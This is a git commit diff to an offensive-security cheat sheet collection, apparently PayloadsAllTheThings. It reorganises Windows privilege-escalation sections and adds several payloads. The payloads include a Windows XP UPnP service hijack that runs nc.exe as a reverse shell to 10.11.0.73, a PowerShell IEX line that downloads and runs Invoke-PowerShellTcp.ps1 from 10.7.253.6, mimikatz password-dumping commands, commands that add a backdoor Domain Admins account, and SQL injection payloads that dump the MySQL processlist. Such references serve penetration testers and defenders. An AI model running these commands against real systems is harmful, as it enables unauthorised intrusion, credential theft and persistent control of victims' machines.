SQL informationschema.processlist + UPNP warning + getcap -ep

This commit is contained in:
Swissky 2019-05-25 18:19:08 +02:00
parent b1a05d1aab
commit f88da43e1c
7 changed files with 84 additions and 60 deletions

View File

@ -22,11 +22,6 @@
* [Trust relationship between domains](#trust-relationship-between-domains)
* [PrivExchange attack](#privexchange-attack)
* [Password spraying](#password-spraying)
* [Privilege Escalation](#privilege-escalation)
* [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato)
* [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
* [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
## Tools
@ -56,6 +51,7 @@
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec smb -L
crackmapexec smb -M name_module -o VAR=DATA
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
@ -598,56 +594,6 @@ Most of the time the best passwords to spray are :
- $Companyname1
## Privilege Escalation
### PrivEsc Local Admin - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
```
```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : `wmic qfe list | find "3139914"`
```powershell
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
### PrivEsc Local Admin - MS17-010 (Eternal Blue)
```c
nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
```
### From Local Admin to Domain Admin
```powershell
net user hacker2 hacker123 /add /Domain
net group "Domain Admins" hacker2 /add /domain
```
## References
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)

View File

@ -242,6 +242,14 @@ sudo chmod +s /tmp/suid # setuid bit
### Interesting capabilities
Having the capability =ep means the binary has all the capabilities.
```powershell
$ getcap openssl /usr/bin/openssl
openssl=ep
```
Alternatively the following capabilities can be used in order to upgrade your current privileges.
```powershell
cap_dac_read_search # read anything
cap_setuid+ep # setuid

View File

@ -153,7 +153,9 @@ execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full
```
```powershell

View File

@ -15,6 +15,10 @@
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
* [EoP - Runas](#eop---runas)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
## Tools
@ -421,9 +425,12 @@ You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify
### Example with Windows XP SP1
```powershell
$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj=".\LocalSystem" password=""
# NOTE: spaces are mandatory for this exploit to work !
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc config upnphost depend= ""
net start upnphost
```
If it fails because of a missing dependency, try the following commands.
@ -586,6 +593,52 @@ $ computer = "<hostname>"
```
## EoP - Common Vulnerabilities and Exposure
### Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
```
```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : `wmic qfe list | find "3139914"`
```powershell
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
### MS17-010 (Eternal Blue)
```c
nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms17010 <ip_netblock>
```
## References

View File

@ -3,9 +3,10 @@
## TIP 1 - Create your credential :D
```powershell
net user hacker hacker /add
net user hacker hacker1234* /add
net localgroup administrators hacker /add
net group "Domain Admins" hacker /ADD /DOMAIN
net localgroup "Remote Desktop Users" hacker /add
net group "Domain Admins" hacker /add /domain
```
Some info about your user

View File

@ -165,6 +165,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
## References
* filedescriptor
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)

View File

@ -19,6 +19,7 @@
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
* [MYSQL Time Based](#mysql-time-based)
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
* [MYSQL Current queries](#mysql-current-queries)
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
* [MYSQL Write a shell](#mysql-write-a-shell)
* [MYSQL UDF command execution](#mysql-udf-command-execution)
@ -223,6 +224,17 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
```
## MYSQL Current queries
This table can list all operations that DB is performing at the moment.
```sql
union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
-- Dump in one shot example for the table content.
union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 #
```
## MYSQL Read content of a file
Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
@ -305,4 +317,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)